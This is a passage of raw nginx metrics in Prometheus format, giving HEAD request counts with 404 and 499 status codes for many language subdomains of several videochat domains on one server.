nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lv.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lv.videochat.date"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lv.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lv.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="lv.videochat.world"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mail.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mg.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mg.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mg.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mg.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mg.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mi.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mi.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mi.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mk.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mk.videochat.date"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mk.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mk.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mk.videochat.world"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.mx"} 220 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ml.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mn.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mn.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mn.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mn.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mpositesmodeca.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mr.videochat.cafe"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mr.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mr.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mr.videochat.world"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mrj.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mrj.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mrj.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mrj.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mrj.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ms.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ms.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ms.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ms.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ms.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mt.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mt.videochat.mx"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mt.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mt.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="mt.videochat.world"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="my.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="my.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="my.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="my.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.mx"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.world"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.show"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.date"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.mx"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pa.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pa.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pa.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pa.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pa.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pap.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pap.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pap.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pap.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pap.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pl.videochat.cafe"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pl.videochat.date"} 82 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pl.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pl.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pl.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pl.videochat.world"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pt.videochat.cafe"} 76 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pt.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pt.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pt.videochat.world"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ro.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ro.videochat.date"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ro.videochat.mx"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ro.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ro.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ro.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sco.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sco.videochat.mx"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sco.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sco.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sco.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="si.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="si.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="si.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="si.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="si.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.mx"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.world"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sl.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sl.videochat.date"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sl.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sl.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sl.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sl.videochat.world"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="slvdtur.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="speed.cloudflare.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sr.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sr.videochat.date"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sr.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sr.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sr.videochat.world"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="su.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="su.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="su.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="su.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sv.videochat.cafe"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sv.videochat.date"} 80 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sv.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sv.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sv.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sw.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sw.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sw.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sw.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sw.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ta.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ta.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ta.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ta.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ta.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="te.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="te.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="te.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="te.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="te.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="te.videochat.world"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="test.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tg.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tg.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tg.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tg.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tg.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tg.videochat.world"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="th.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="th.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="th.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="th.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="th.videochat.world"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tl.videochat.date"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tl.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tl.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tl.videochat.world"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tr.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tr.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tr.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tr.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tr.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tt.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tt.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tt.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tt.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tt.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tt.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uavnrde.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="udm.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="udm.videochat.mx"} 138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="udm.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="udm.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="udm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uk.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uk.videochat.date"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uk.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uk.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uk.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ur.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ur.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ur.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ur.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uz.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uz.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uz.videochat.tv.br"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uz.videochat.world"} 92 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.date"} 116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.cafe"} 2531 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.date"} 2837 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.mx"} 3155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.show"} 2506 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.tv.br"} 2620 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.world"} 3600 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vmi460104.contaboserver.net"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="www.videochat.cafe"} 148 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="www.videochat.date"} 194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="www.videochat.mx"} 176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="www.videochat.show"} 189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="www.videochat.world"} 245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xh.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xh.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xh.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xh.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xh.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xrmjgmi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.mx"} 169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.tv.br"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zdchomr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.date"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="be.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="bg.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="bn.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="bs.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ca.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="cs.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="cs.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ee.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="es.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="es.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="et.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="eu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="fa.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="fa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="he.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="he.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="hr.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="hu.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="id.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="is.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="it.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="jp.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="jv.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ka.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="km.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="km.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="kn.videochat.mx"} 1 